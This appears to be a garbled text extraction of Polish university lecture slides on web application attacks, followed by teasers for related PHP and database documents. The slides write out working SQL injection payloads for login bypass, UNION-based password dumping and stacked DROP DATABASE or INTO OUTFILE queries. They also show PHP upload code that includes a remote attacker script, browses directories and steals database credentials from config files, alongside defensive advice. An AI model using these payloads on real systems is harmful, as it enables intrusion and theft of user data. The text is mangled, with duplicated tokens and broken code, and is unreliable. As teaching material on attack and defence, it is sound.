Blokada zaznaczania tekstu tylko IE Wyłączenie przedstawiania" name="description"> Blokada zaznaczania tekstu tylko IE Wyłączenie przedstawiania">

Wyłą ł c ą zamy am pr p aw y pr p z r ycisk Bezpi z e pi cz c e z ńs ń two w apl a i pl k i ac a ji W W

Wielkość: px
Rozpocząć pokaz od strony:

Download "Wyłą ł c ą zamy am pr p aw y pr p z r ycisk Bezpi z e pi cz c e z ńs ń two w apl a i pl k i ac a ji W W

Transkrypt

1 Bezpieczeństwo aplikacji WWW Ataki na strony internetowe i bazy danych Wyłączamy prawy przycisk <BODY oncontextmenu = "return false"> </BODY> Blokada zaznaczania tekstu tylko IE Wyłączenie przedstawiania się Apache: httpd.conf - ServerSignature On/off Ustawienie na off - nie wyświetla informacji o wersji serwera <BODY onselectstart="return false" onselect="return false" oncopy="return false"> </BODY> Ustawiamy httpd.conf (dyrektywa <Directory "C:/Program Files/EasyPHP1-8/www"> Options None </Directory> Zachowanie serwera WWW Zachowanie serwera WWW 1

2 Zachowanie serwera WWW SQL injection Eksploatacja baz danych. Sposób pośredni - dowolny interfejs do bazy danych. Całość aplikacji składa się z trzech warstw: 1. Klient. 2. Warstwa pośrednicząca. 3. Baza danych. Zwykle dane do zapytania wpisujemy w odpowiednim okienku za pomocą interfejsu, a następnie są one przetwarzane przez warstwę pośredniczącą, która konstruuje z tych danych pełnoprawne zapytanie SQL i przesyła je do bazy danych. SQL injection polega na nieautoryzowanym wykonaniu wyrażeń języka SQL. SQL injection to metoda ataku polegająca na dodaniu do zapytania wykonywanego przez warstwę pośredniczącą dodatkowego lub zmodyfikowanego zapytania SQL. Atak wykorzystuje wywołanie zapytania SQL w aplikacji, w której nie przetwarza się danych uzyskanych od użytkownika. Najczęściej polega na takim skonstruowaniu formuły SQL, by sprawdzanie wprowadzonych danych nie miało znaczenia. Zagrożenia SQL injection sposób wykonania W rezultacie może to prowadzić do: zdobycia danych, do których użytkownik nie jest uprawniony; zmodyfikowania danych, bądź dodania do bazy dodatkowych danych; obejścia mechanizmów opartych na pobieraniu danych z bazy (np. autoryzacji. Adres Formularz 2

3 Zagrożenia wynikające z użycia słowa kluczowego like Metoda get wpisanie loginu i hasła z paska adresu z użyciem słowa kluczowego like Oryginalne zapytanie w skrypcie php: select login from users where login like '$login' and haslo like '$haslo Jeżeli z paska adresu wpiszemy: =tajne Jeżeli z paska adresu wpiszemy: Przy założeniu, że nie znamy hasła. LOGOWANIE poprawne select login from users where login like admin and haslo like % Przy założeniu, że znamy poprawne dane. LOGOWANIE - poprawne Jeżeli nie znamy loginu ani hasła: Logowanie na pierwszego użytkownika z bazy select login from users where login like % and haslo like % Rezygnacja z like. Login i haslo wprowadzane z paska adresu zmienne przesyłane metodą Get. "select login from users where login='$login' and haslo='$haslo'"; "select login from users where login='$login' and haslo='$haslo'"; Próba użycia symbolu % "select login from users where login='$login' /* to co należy wpisać jako zmienną login w pasku adresu: admin /* - pozostała część zapytania zostanie pomięta 3

4 Użycie formularza $zapytanie = "select login from users where login='$login' and haslo='$ ='$haslo'"; SQL injection filozofia działania Normalny przebieg logowania $query = "SELECT * FROM uzytkownicy WHERE uzytkownik = $uzytkownik administrator AND haslo = $haslo "; tajnehaslo "; $result = mysql_query( $query ; if( mysql_num_rows ( $result > 0 { //zaloguj użykownika else { //nie można zalogować administrator tajnehaslo SQL injection filozofia działania Logowanie z wykorzystaniem SQL injection $query = "SELECT * FROM uzytkownicy WHERE uzytkownik = '$uzytkownik' administrator /* AND haslo = '$haslo' "; "; $result = mysql_query( $query ; if( mysq_num_rows ( $result > 0 { //zaloguj użykownika else { //nie można zalogować administrator /* Przy wysyłaniu formularzy bądź pobieraniu zmiennych z adresu url wszystkie cudzysłowy zarówno pojedyncze jak i podwójne są zmieniane na \' lub \". Przyczyną takiego zachowania jest opcja magic_quotes_gpc ustawiona na On w php.ini. Stosuje się ją aby zabezpieczyć aplikację przed atakiem SQL Injection w razie, gdyby programista gdzieś zapomniał o przefiltrowaniu danych od użytkownika, które potem wykorzystywane są w zapytaniach SQL. Aby usunąć ze zmiennych POST czy GET niepotrzebne znaki backslash stosujemy funkcję stripslashes(. Usuwa ona znaki ucieczki '\'' z ciągu podanego jako argument. Gdy opcja magic_quotes_gpc w php.ini jest ustawiona na On to PHP automatycznie przepuszcza wszystkie zmienne z tablic superglobalnych takich jak POST czy GET przez funkcję addslashes(. Manipulacja stripslashes i addslashes. magic_quotes_gpc = On / Off Formularz zbudowany wewnątrz php z użyciem funkcji echo (znaki ucieczki. $username1 = stripslashes($login; $username2 = addslashes($login; SELECT * FROM users WHERE `username` = 'admin' /*' AND `password` = '' SELECT * FROM users WHERE `username` = 'inny' OR 1=1 /*' AND `password` = 4

5 Zapytanie zawsze prawdziwe ostatecznie pojawią się informacje o ostatnim użytkowniku SQL injection admin' /* SELECT * FROM users WHERE `username` = 'admin' /*' AND `password` = ' ' admin' OR 1=1 /* SELECT * FROM users WHERE `username` = 'inny' OR 1=1 /*' AND `password` = ' ' magic_quotes_gpc = Off/On, stripslashes Ataki SQL injection typu Nie ma takiego użytkownika UNION SELECT Unia pozwala na zsumowanie zbiorów krotek dwóch lub więcej relacji (bez powtórzeń - zgodnie z teorią mnogości. Warunkiem poprawności tej operacji jest zgodność liczby i typów atrybutów (kolumn sumowanych relacji. Przykład przedstawiony poniżej sumuje zbiory pracowników i właścicieli okrojone do imienia i nazwiska (za pomocą projekcji, w celu uzyskania informacji o wszystkich ludziach powiązanych z firmą SELECT imie, nazwisko FROM pracownicy UNION SELECT imie, nazwisko FROM wlasciciele ; W przypadku użycia UNION zostają wyświetlone wiersze zwracane przez składowe zapytania, przy czym zostają usunięte wiersze powtarzające się. Domyślną opcją dla Union jest distinct gdy chcemy pobrać wszystkie dane należy użyć opcji all. Operacje mnogościowe na wynikach zapytań Filmy id_filmu tytul rok_produkcji cena 1 Wesele Ghostbusters Terminator SELECT TYTUL FROM FILMY UNION SELECT NAZWISKO FROM KLIENCI; tytul Ghostbusters Kowalski Nowak Terminator Wesele (5 rows Klienci id_klienta imie nazwisko 1 Jan Kowalski 2 Anna Nowak UNION suma mnogościowa z eliminacją duplikatów UNION ALL suma mnogościowa bez eliminacji duplikatów 5

6 Cel pobranie hasła dla wybranego użytkownika "select login from users where id = $id limit 1"; id=1 and 1=0 union select haslo from users zapytanie zwraca hasło pierwszego użytkownika z bazy pierwsze zapytanie jest zawsze fałszywe i nie ma wpływu na zwracane dane. select login from users where id = 1 and 1=0 union select haslo from users limit 1. Jeżeli chcemy wyświetlić hasło dowolnego użytkownika z bazy należy wpisać select login from users where id = 1 and 1=0 union select haslo from users where id = 2 limit 1. Metodą obrony przed tego typu atakami może być użycie funkcji intval. Zamienia ona podany argument na liczbę: $id = intval($_get['id']; Z id=1 and 1=0 union select haslo from users robi się 0 lub 1 ((1 1 nie mamy poprawy sytuacji Cel pobranie wszystkich użytkowników z bazy wraz z ich hasłami select login from users where login like '$login $login%' %' limit 2 Wyświetla dwóch użytkowników z bazy danych jeżeli się nie poda nic to będzie to dwóch pierwszych, jeżeli się poda literę (wzorzec pierwszych dwóch spełniających kryteria. and 1=2 union select login from users/* przed znakiem procenta pojawia się komentarz dalsza część skryptu nie jest brana pod uwagę and 1=2 union select haslo from users/* Użycie funkcji concat łączy dwa atrybuty obchodzimy ograniczenie wynikające z pierwszego zapytania. Można pomiędzy loginem a haslem wstawić dwukropek char(58.?login=1' and 1=2 union select concat concat(login, (login, char(58, haslo haslo from users/* Czy można dodać do drugiej części zapytania login, haslo 6

7 Cel ataku - rozpoznawanie struktury tabeli Select login, coś_jeszcze... from users where login like '$login% Zapytanie, które się wykonuje oczywiście nigdy nie będzie widoczne dla użytkownika. Spróbujmy sobie je wyobrazić: select (określona jednak nieznana liczba kolumn from users where login = $login% oraz ewentualnie dalsza część Jeżeli w pierwszej części zapytania jest jeden atrybut zapytanie wykona się poprawnie, jeśli nie pojawi się błąd o niezgodności liczby kolumn w dwóch zapytaniach. Testujemy kolejno:?login=' and 1=2 union select 1,2,3,4 /* To zapytanie wykona się poprawnie wyświetli numer pozycji, na której jest login.?login=' and 1=2 union select 1,login,3,4 from users/* Czy da się określić liczbę kolumn w zapytaniu, czy da się wyłowić wszystkich użytkowników oraz ich hasła. Wyświetli wszystkich użytkowników z bazy. select (tego nie znamy from users where login = $login% zamiast zmiennej login wpisujemy:?login=' and 1=2 union select 1 /* Wyświetli wszystkich użytkowników z bazy oraz ich hasła.?login=1' and 1=2 union select 1,concat(login,char 1,concat( login,char(58, (58, haslo,3,4 haslo,3,4 from users/*?login=' and 1=2 union select 1,login,3,4 from users/* Wyświetli wszystkich użytkowników z bazy.?login=1' and 1=2 union select 1,concat(login, char(58, char(58,haslo haslo,3,4,3,4 from users/* Wyświetli wszystkich użytkowników z bazy oraz ich hasła. %20select%201,concat(login,%20char(58,%20haslo%20,3,4% 20from%20users/* Skrypt pobiera nazwę użytkownika (login i sprawdza czy istnieje on w bazie danych. Celem ataku jest poznanie hasła wybranego (istniejącego użytkownika. Nie można użyć jak poprzednio union select nie znamy nazw atrybutów skrypt wyświetla tylko login. Nie znamy treści zapytania możemy się jednak domyślać select from where login ='$login' Pola zakropkowane są nieznane, dane od użytkownika są wstawiane w miejsce $login: select from where login ='admin' ='admin' and haslo like '%' /* Nic się nie zmieniło mamy potwierdzenie, że użytkownik admin istnieje użycie % - nie sprawdza hasła. Teraz można zastosować metodę bruce force: select from where login ='admin' and haslo like 'a%' /* jeżeli poinformuje nas że użytkownik istnieje oznacza to że hasło rozpoczyna się na literę a, i tak aż do skutku, kolejne litery na koniec powinniśmy usunąć znak %. 7

8 Jak unikać SQL Injection 1. Analizowanie wejścia - wszystkie dane pochodzące z zewnątrz aplikacji powinny być filtrowane. Procedury powinny przepuszczać tylko te znaki/ciągi, które są dopuszczalne w danym kontekście. Szczególnie ważne jest wyszukiwanie słów kluczowych, takich jak SELECT. Znaków takich jak cudzysłów, apostrof czy podwójny myślnik. Oczyszczanie wczytanego ciągu znaków nie zawsze jest jednak rzeczą prostą, a przynajmniej czasami, może być uciążliwe (SQL jest językiem rozbudowanym, istotny jest również kontekst, w którym znaki zostają wczytane. 2. Zarządzanie komunikatami o błędach - zwykły użytkownik nie powinien otrzymywać komunikatów, mogących zdradzać szczegóły budowy bazy danych. Jak unikać SQL Injection Ograniczanie uprawnień użytkowników - przy nadawaniu uprawnień należy stosować zasadę najmniejszych przywilejów. W fazie projektowania należy zdefiniować najmniejszy zestaw informacji niezbędny do wykonania danego zadania. Szczególną uwagę należy zwrócić na prawa dostępu do wewnętrznych struktur bazy danych. Oddzielenie danych od kodu Unikanie dynamicznie generowanego kodu SQL jest najlepszym rozwiązaniem. Większość interfejsów baz danych zapewnia taką możliwość (parametry wiązane - PHP, parametry nazwane JDBC. Wyrażenie powinno najpierw zostać "przygotowane" i czekać w bazie na wyliczenie z podanym parametrem, który już nie może zostać pomylony z kodem. SQL injection - zagrożenia wyświetli wszystkich użytkowników a ; SELECT * FROM users; -- eksportuje listę użytkowników a ; SELECT users INTO OUTFILE '/tmp/result.txt' FROM users; -usunie systemową bazę danych a ; DROP DATABASE system; -- zmieni hasło administratora a ; UPDATE users SET password = aaa WHERE login = administrator ; -- Upload plików na witrynie WWW usuwa tabelę użytkowników a ; DROP TABLE users; -- zmieni hasło dostępu do bazy danych a ; ALTER USER dbowner IDENTIFIED BY NoweHaslo; -- 8

9 Założenia strona napisana w PHP z możliwością wgrywania własnych plików np. fora dyskusyjne, strony studenckie do wymiany materiałów dydaktycznych lub jeżeli posiadamy stronę WWW na atakowanym serwerze; Na stronę wgrywamy dowolny plik z rozszerzeniem.php php;; Plik zawiera tylko jedną instrukcję (np. plik.php plik.php: : <? phpinfo(; phpinfo (;?> W chwili jego wywołania wykona się funkcja. Przykład 2. <? if ($_SERVER['REMOTE_ADDR'] == 'adres' include('http://adres/test.???'; else echo ':';?> W chwili jego wywołania wykona się powyższa instrukcja (oczywiście można umieścić całość właściwego kodu bezpośrednio tu ale nie mamy możliwości swobodnego manipulowania zawartością; Dodatkowo zabezpieczamy się przed dostępem do naszego skryptu przez osoby trzecie. Ważne jest, aby plik dołączany z zewnątrz poprzez polecenie include include miał rozszerzenie inne niż.php.php,, po to, by nie został wykonany po stronie serwera, z którego ma być dołączany. Skoro można wykonać dowolny skrypt php z zewnętrznego adresu: // funkcja wyświetlająca prawa dostępu do pliku function showperms showperms($file ($file { $perms = fileperms fileperms($file; ($file; if (($ perms & 0xC000 == 0xC000 0xC000 $info = 's'; elseif (($ perms & 0xA000 == 0xA000 0xA000 $info = 'l'; elseif (($ perms & 0x8000 == 0x8000 0x8000 $info = ''-'; elseif (($ perms & 0x6000 == 0x6000 0x6000 $info = 'b'; elseif (($ perms & 0x4000 == 0x4000 0x4000 $info = 'd'; elseif (($ perms & 0x2000 == 0x2000 0x2000 $info = 'c'; elseif (($ perms & 0x1000 == 0x1000 0x1000 $info = 'p'; else $info = 'u'; & 0x0100? 'r 'r' : ''-'; $info $info & 0x0040? & 0x0800? & 0x0020? 'r 'r' : ''-'; & 0x0010? 'w' : ''-'; & 0x0008? & 0x0400? & 0x0004? 'r 'r' : ''-'; & 0x0002? 'w' : ''-'; & 0x0001? & 0x0200? echo $info $info; ; // funkcja listująca dany katalog wraz z prawami dostępu do plików (wykorzystuje powyższą funkcję showperms function showfiles showfiles($ ($dir dir { $handle = opendir opendir($dir; ($dir; echo "<table>"; while ($file = readdir readdir($handle ($handle { echo "<tr "<tr><td>".$file."</td><td>"; ><td>".$file."</td><td>"; showperms($ showperms ($dir.$file dir.$file; ; echo "</td></tr "</td></tr>"; >"; echo "</table>";.= & 0x0080? 'w' : ''-'; 's' : 'x' : & 0x0800?'S :' 0x0800?'S :'-'; 's' : 'x' : : & 0x0400?'S : ''-'; 't' : 'x' : : & 0x0200?'T : ''-'; 9

10 a Przykład użycia powyższych funkcji: //funkcja wyświetlająca plik function readf readf($ ($myfile myfile { $fh = fopen fopen($ ($myfile myfile,, 'r'; $thedata = fread fread($ ($fh fh,, filesize($ filesize ($myfile myfile; ; fclose($ fclose ($fh fh; ; echo $thedata $thedata; ; $path = './'; showfiles($path; Zmienną $path możemy zmieniać kolejno na: '../', '../../', '../../../' showfiles($ showfiles ($path path funkcja prezentująca pliki i ich atrybuty z katalogu bieżącego, w którym umieściliśmy plik.php.php.. Problematyka praw dostępu do plików i katalogów z poziomu WWW chamod.. chamod Upload plików na witrynie WWW Pierwszym celem jest możliwość penetracji katalogów i plików; <? $path = './'; $path = '../'; $path =../../'; showfiles($ showfiles ($path path; ; showfiles($ showfiles ($path path funkcja prezentująca pliki i ich atrybuty z katalogu bieżącego, w którym umieściliśmy plik.php.php.. Problematyka praw dostępu do plików i katalogów z poziomu WWW chamod chamod.. Każdy plik, do którego mamy prawo czytania, możemy wyświetlić przy pomocy funkcji readf. Każdy plik, do którego mamy prawo czytania, możemy wyświetlić przy pomocy funkcji readf. Jeśli znajdziemy w obrębie katalogu strony katalog z prawami dostępu 777, możemy do niego kopiować dowolne pliki, do których mamy prawo czytania, np. pliki strony z rozszerzeniem.php, plik /etc/passwd, a następnie możemy przeglądać te pliki z poziomu przeglądarki. Jeśli znajdziemy w obrębie katalogu strony katalog z prawami dostępu 777, możemy do niego kopiować dowolne pliki, do których mamy prawo czytania, np. pliki strony z rozszerzeniem.php, plik /etc/passwd, a następnie możemy przeglądać te pliki z poziomu przeglądarki. Jeśli dana strona korzysta z bazy danych, w plikach.php możemy odnaleźć funkcję odwołujące się do bazy danych wraz z loginem, hasłem i nazwą bazy. Stąd już krótka droga do poznania struktury bazy oraz przeczytania informacji w niej zapisanych. Jeśli dana strona korzysta z bazy danych, w plikach.php możemy odnaleźć funkcję odwołujące się do bazy danych wraz z loginem, hasłem i nazwą bazy. Stąd już krótka droga do poznania struktury bazy oraz przeczytania informacji w niej zapisanych. 10

11 Upload plików na witrynie WWW Źródło strony Alternatywna metoda pobranie interesujących nas plików (nie jesteśmy w stanie odczytać zawartości pików z rozszerzeniem.php.php wykonują się one po stronie serwera, a do przeglądarki zwracany jest tylko wynik nie odczytamy np. haseł dostępu do bazy. <? $dir = './'; copy($ copy ($dir.'config.php dir.'config.php', ', 'test.txt 'test.txt'; ';?> Mając login i hasło do bazy, można wykonać dowolne zapytanie sql sql;; function czytajbaze czytajbaze( ( { $polacz=mysql_connect polacz=mysql_connect(" ("localhost localhost", ", "tajna", "tajne" or die("połączenie die ("Połączenie z baz. danych nie jest możliwe."; mysql_select_db(" mysql_select_db ("baza",$polacz baza",$polacz or die die("wystąpił ("Wystąpił błąd."; $zapytanie = "select "select * FROM users users"; "; $wykonaj = mysql_query mysql_query($zapytanie ($zapytanie or die die("wystąpił ("Wystąpił nieoczekiwany błąd."; while ($ ($rzad rzad = mysql_fetch_array mysql_fetch_array($wykonaj ($wykonaj { echo $rzad $rzad['login'].' ['login'].' <b>'.$rzad <b>'.$rzad[' ['haslo haslo'].'</ '].'</b><br b><br>'; >'; Mając login i hasło do bazy, można wykonać dowolne zapytanie sql sql;; function czytajbaze czytajbaze( ( { $polacz=mysql_connect polacz=mysql_connect(" ("localhost localhost", ", "tajna", "tajne" or die("połączenie die ("Połączenie z baz. danych nie jest możliwe."; Protokół TCP/IP nie posiada wbudowanych funkcji szyfrujących. mysql_select_db(" mysql_select_db ("baza",$polacz baza",$polacz or die die("wystąpił ("Wystąpił błąd."; $zapytanie = drop database dbsql dbsql"; "; Także HTTP, korzystający z TCP/IP nie zapewnia bezpieczeństwa danych. Wszystkie strony internetowe oraz dane są przesyłane w sposób jawny i narażone tym samym na śledzenie i przechwytywanie. W celu stworzenia bezpiecznego połączenia pomiędzy komputerami stosuje się protokół SSL, który zapewnia szyfrowanie na zadowalającym poziomie. Szyfrowanie przebiega z zastosowaniem klucza prywatnego i publicznego. 11

12 Przesyłanie danych z formularzy. Problematyka ukrywania kodu. Można je przesyłać na dwa sposoby. Jeśli potencjalny włamywacz nie wie co skrypt robi, jaka jest architektura naszej bazy danych, może tylko zgadywać. Poprzez post i get. Jeśli serwery WWW i PHP pracują prawidłowo nie ma możliwości podejrzenia kodu PHP strony poprzez stronę internetową. Co jednak gdy serwer PHP lub WWW będzie miał awarię? Jeśli serwer WWW nieprawidłowo zainstaluje PHP to może zamiast wykonania skryptu wyświetlić jego kod. Należy zatem zadbać by pliki zawierające login i hasło do bazy danych nie były dostępne z poziomu serwera WWW, a do skryptu dołączane poprzez funkcję include. <?php Odradza się stosowanie get ponieważ dane wysyłane tą metodą są jawnie dołączone do adresu URL. Np. po wysłaniu swojego hasła z formularza poprzez get wyświetli się adres: Pobierane od użytkownika hasło poprzez formularz, należy zastosować opcję password password.. Aby zapewnić bezpieczeństwo skryptom należy zawsze inicjować zmienne oraz korzystać z tablic (register_globals register_globals: : include("../../../dane.php";?> $HTTP_COOKIE_VARS Tak dołączony plik nie będzie dostępny z poziomu adresu URL w przypadku nieprawidłowego działania serwera WWW lub PHP. $HTTP_POST_VARS HTTP_POST_VARS,, $_POST Można też do ochrony skryptu zastosować funkcję error_reporting(0. Przy takim ustawieniu nie zostanie wyświetlony żaden błąd w trakcie wykonania skryptu i potencjalny włamywacz nie pozna nazwy funkcji czy pliku jaki używamy. $HTTP_GET_VARS HTTP_GET_VARS,, $_GET a nie globalnych zmiennych. Zabezpieczymy się przed ingerencją włamywacza poprzez inicjowanie zmiennych dzięki adresowi URL. 12

6. Bezpieczeństwo przy współpracy z bazami danych

6. Bezpieczeństwo przy współpracy z bazami danych 6. Bezpieczeństwo przy współpracy z bazami danych 6.1. Idea ataku SQL injection Atak znany jako SQL injection jest możliwy wtedy, gdy użytkownik ma bezpośredni wpływ na postać zapytania wysyłanego do bazy

Bardziej szczegółowo

Lekcja 10. Uprawnienia. Dołączanie plików przy pomocy funkcji include() Sprawdzanie, czy plik istnieje przy pmocy funkcji file_exists()

Lekcja 10. Uprawnienia. Dołączanie plików przy pomocy funkcji include() Sprawdzanie, czy plik istnieje przy pmocy funkcji file_exists() Paweł Gmys PHP strona 1 Lekcja 10 Uprawnienia Aby skrypt PHP mógł odwołać się do pliku, musi mieć odpowiednie uprawnienia. Szczegóły są zależne od serwera. Najczęściej chyba skrypt ma uprawnienia takie,

Bardziej szczegółowo

Projektowani Systemów Inf.

Projektowani Systemów Inf. Projektowani Systemów Inf. Wykład VII Bezpieczeństwo Copyrights by Arkadiusz Rzucidło 1 Bezpieczeństwo Bezpieczeństwo związane z danymi Konstrukcja magazynów danych Mechanizmy zapisu i modyfikacji danych

Bardziej szczegółowo

Języki programowania wysokiego poziomu. PHP cz.4. Bazy danych

Języki programowania wysokiego poziomu. PHP cz.4. Bazy danych Języki programowania wysokiego poziomu PHP cz.4. Bazy danych PHP i bazy danych PHP może zostać rozszerzony o mechanizmy dostępu do różnych baz danych: MySQL moduł mysql albo jego nowsza wersja mysqli (moduł

Bardziej szczegółowo

Pawel@Kasprowski.pl Języki skryptowe - PHP. PHP i bazy danych. Paweł Kasprowski. pawel@kasprowski.pl. vl07

Pawel@Kasprowski.pl Języki skryptowe - PHP. PHP i bazy danych. Paweł Kasprowski. pawel@kasprowski.pl. vl07 PHP i bazy danych Paweł Kasprowski pawel@kasprowski.pl Użycie baz danych Bazy danych używane są w 90% aplikacji PHP Najczęściej jest to MySQL Funkcje dotyczące baz danych używają języka SQL Przydaje się

Bardziej szczegółowo

5. Współpraca z bazą danych MySQL

5. Współpraca z bazą danych MySQL 5. Współpraca z bazą danych MySQL 5.1. Informacje ogólne Język PHP posiada obsługę wielu relacyjnych baz danych, jedną z najpopularniejszych jest baza MySQL. PHP pozwala na pełną współpracę z bazą. Praca

Bardziej szczegółowo

Aplikacje WWW - laboratorium

Aplikacje WWW - laboratorium Aplikacje WWW - laboratorium PHP. Celem ćwiczenia jest przygotowanie prostej aplikacji internetowej wykorzystującej technologię PHP. Aplikacja pokazuje takie aspekty, obsługa formularzy oraz zmiennych

Bardziej szczegółowo

Internetowe bazy danych

Internetowe bazy danych Wyższa Szkoła Technologii Teleinformatycznych w Świdnicy Internetowe bazy danych wykład 6 dr inż. Jacek Mazurkiewicz e-mail: Jacek.Mazurkiewicz@pwr.wroc.pl Kontrola dostępu

Bardziej szczegółowo

Dokumentacja interfejsu HTTPD. Platforma BSMS.PL Instrukcja podłączenia po przez http

Dokumentacja interfejsu HTTPD. Platforma BSMS.PL Instrukcja podłączenia po przez http Dokumentacja interfejsu HTTPD Platforma BSMS.PL Instrukcja podłączenia po przez http Dokumentacja interfejsu httpd (strona 2) SPIS TREŚCI 1. Zawartość dokumentu str.3 2. Informacje ogólne 2.1 Zastosowanie

Bardziej szczegółowo

Aplikacje WWW - laboratorium

Aplikacje WWW - laboratorium Aplikacje WWW - laboratorium PHP + bazy danych Celem ćwiczenia jest przygotowanie prostej aplikacji internetowej wykorzystującej technologię PHP. Aplikacja pokazuje takie aspekty, współpraca PHP z bazami

Bardziej szczegółowo

Instalacja MySQL. http://dev.mysql.com/downloads/mysql/5.0.html#downloads

Instalacja MySQL. http://dev.mysql.com/downloads/mysql/5.0.html#downloads Instalacja MySQL Baza MySQL tworzona jest przez Szwedzką firmę MySQL AB strona domowa projektu to: www.mysql.com Wersję bezpłatną (różniącą się od komercyjnej brakiem wsparcia technicznego, nośnika i podręcznika)

Bardziej szczegółowo

ZAAWANSOWANE BAZY DANYCH I HURTOWNIE DANYCH MySQL, PHP

ZAAWANSOWANE BAZY DANYCH I HURTOWNIE DANYCH MySQL, PHP ZAAWANSOWANE BAZY DANYCH I HURTOWNIE DANYCH MySQL, PHP Zad. 1 Dla każdego zamówienia wyznaczyć jego wartość. Należy podać numer zamówienia oraz wartość. select z.id_zamowienia, sum(ilosc*cena) as wartosc

Bardziej szczegółowo

SQL injection. Metody włamań do systemów komputerowych p. 1/13. Bogusław Kluge, Karina Łuksza, Ewa Makosa

SQL injection. Metody włamań do systemów komputerowych p. 1/13. Bogusław Kluge, Karina Łuksza, Ewa Makosa Metody włamań do systemów komputerowych SQL injection Bogusław Kluge, Karina Łuksza, Ewa Makosa b.kluge@zodiac.mimuw.edu.pl, k.luksza@zodiac.mimuw.edu.pl, e.makosa@zodiac.mimuw.edu.pl Metody włamań do

Bardziej szczegółowo

Bazy danych. Wykład IV SQL - wprowadzenie. Copyrights by Arkadiusz Rzucidło 1

Bazy danych. Wykład IV SQL - wprowadzenie. Copyrights by Arkadiusz Rzucidło 1 Bazy danych Wykład IV SQL - wprowadzenie Copyrights by Arkadiusz Rzucidło 1 Czym jest SQL Język zapytań deklaratywny dostęp do danych Składnia łatwa i naturalna Standardowe narzędzie dostępu do wielu różnych

Bardziej szczegółowo

Wydział Elektrotechniki, Informatyki i Telekomunikacji Instytut Informatyki i Elektroniki

Wydział Elektrotechniki, Informatyki i Telekomunikacji Instytut Informatyki i Elektroniki Wydział Elektrotechniki, Informatyki i Telekomunikacji Instytut Informatyki i Elektroniki Instrukcja do zajęć laboratoryjnych Przetwarzanie i organizowanie danych : bazy danych Nr ćwiczenia 10 Temat Aplikacje

Bardziej szczegółowo

Zagadnienia. Konstrukcja bibliotek mysql i mysqli w PHP. Dynamiczne generowanie stron. Połączenie, zapytanie i sesja

Zagadnienia. Konstrukcja bibliotek mysql i mysqli w PHP. Dynamiczne generowanie stron. Połączenie, zapytanie i sesja Zagadnienia Konstrukcja bibliotek mysql i mysqli w PHP Dynamiczne generowanie stron Połączenie, zapytanie i sesja Podstawowe opakowanie dla zapytań SQL w PHP Zarządzania uŝytkownikami Włamania do mysql

Bardziej szczegółowo

DECLARE VARIABLE zmienna1 typ danych; BEGIN

DECLARE VARIABLE zmienna1 typ danych; BEGIN Procedury zapamiętane w Interbase - samodzielne programy napisane w specjalnym języku (właściwym dla serwera baz danych Interbase), który umożliwia tworzenie zapytań, pętli, instrukcji warunkowych itp.;

Bardziej szczegółowo

Dokumentacja smsapi wersja 1.4

Dokumentacja smsapi wersja 1.4 Dokumentacja smsapi wersja 1.4 1. Wprowadzenie Platforma smsapi została skierowana do użytkowników chcących rozbudować swoje aplikacje o system wysyłania smsów. Aplikacja ta w prosty sposób umożliwia integrację

Bardziej szczegółowo

Aplikacje internetowe - laboratorium

Aplikacje internetowe - laboratorium Aplikacje internetowe - laboratorium PHP Celem ćwiczenia jest przygotowanie prostej aplikacji internetowej opartej o język PHP. Aplikacja ilustruje takie mechanizmy jak: obsługa formularzy oraz obsługa

Bardziej szczegółowo

Zagrożenia trywialne. Zagrożenia bezpieczeństwa aplikacji internetowych. Parametry ukryte. Modyfikowanie parametrów wywołania

Zagrożenia trywialne. Zagrożenia bezpieczeństwa aplikacji internetowych. Parametry ukryte. Modyfikowanie parametrów wywołania Zagrożenia trywialne Zagrożenia bezpieczeństwa aplikacji internetowych Rozwiązania charakterystyczne dla fazy rozwoju opisy rozpoznanych błędów, debugging, komentarze poprzednie wersje plików (cp plik.jsp

Bardziej szczegółowo

Sesje, ciasteczka, wyjątki. Ciasteczka w PHP. Zastosowanie cookies. Sprawdzanie obecności ciasteczka

Sesje, ciasteczka, wyjątki. Ciasteczka w PHP. Zastosowanie cookies. Sprawdzanie obecności ciasteczka Sesje, ciasteczka, wyjątki Nie sposób wyobrazić sobie bez nich takich podstawowych zastosowań, jak logowanie użytkowników czy funkcjonowanie koszyka na zakupy. Oprócz tego dowiesz się, czym są wyjątki,

Bardziej szczegółowo

Technologie Internetowe Raport z wykonanego projektu Temat: Internetowy sklep elektroniczny

Technologie Internetowe Raport z wykonanego projektu Temat: Internetowy sklep elektroniczny Technologie Internetowe Raport z wykonanego projektu Temat: Internetowy sklep elektroniczny AiRIII gr. 2TI sekcja 1 Autorzy: Tomasz Bizon Józef Wawrzyczek 2 1. Wstęp Celem projektu było stworzenie sklepu

Bardziej szczegółowo

Zajęcia 10 obsługa formularzy w PHP

Zajęcia 10 obsługa formularzy w PHP Zajęcia 10 obsługa formularzy w PHP Przekazywanie danych ze strony do skryptu PHP Dane ze strony WWW do skryptu PHP przekazujemy za pomocą formularzy. W tym celu musimy stworzyć formularz (znacznik ),

Bardziej szczegółowo

Aplikacje WWW - laboratorium

Aplikacje WWW - laboratorium Aplikacje WWW - laboratorium PHP + bazy danych Celem ćwiczenia jest przygotowanie prostej aplikacji internetowej wykorzystującej technologię PHP. Aplikacja pokazuje takie aspekty, współpraca PHP z bazami

Bardziej szczegółowo

Nr: 12. Tytuł: UDOSTĘPNIANIE DANYCH O SPRAWACH KLIENTOM KANCELARII NA ZEWNĘTRZNYCH SERWERACH WWW. Data modyfikacji: 2012-03-08

Nr: 12. Tytuł: UDOSTĘPNIANIE DANYCH O SPRAWACH KLIENTOM KANCELARII NA ZEWNĘTRZNYCH SERWERACH WWW. Data modyfikacji: 2012-03-08 Nr: 12 Tytuł: UDOSTĘPNIANIE DANYCH O SPRAWACH KLIENTOM KANCELARII NA ZEWNĘTRZNYCH SERWERACH WWW Data modyfikacji: 2012-03-08 Co zawiera ten dokument: Ten dokument zawiera informacje o możliwościach i sposobie

Bardziej szczegółowo

SQL (ang. Structured Query Language)

SQL (ang. Structured Query Language) SQL (ang. Structured Query Language) SELECT pobranie danych z bazy, INSERT umieszczenie danych w bazie, UPDATE zmiana danych, DELETE usunięcie danych z bazy. Rozkaz INSERT Rozkaz insert dodaje nowe wiersze

Bardziej szczegółowo

Rys. 1. Widok uruchomienia polecenia apt-get install build-essential. Rys. 2. Widok uruchomienia polecenia apt-get install apache2

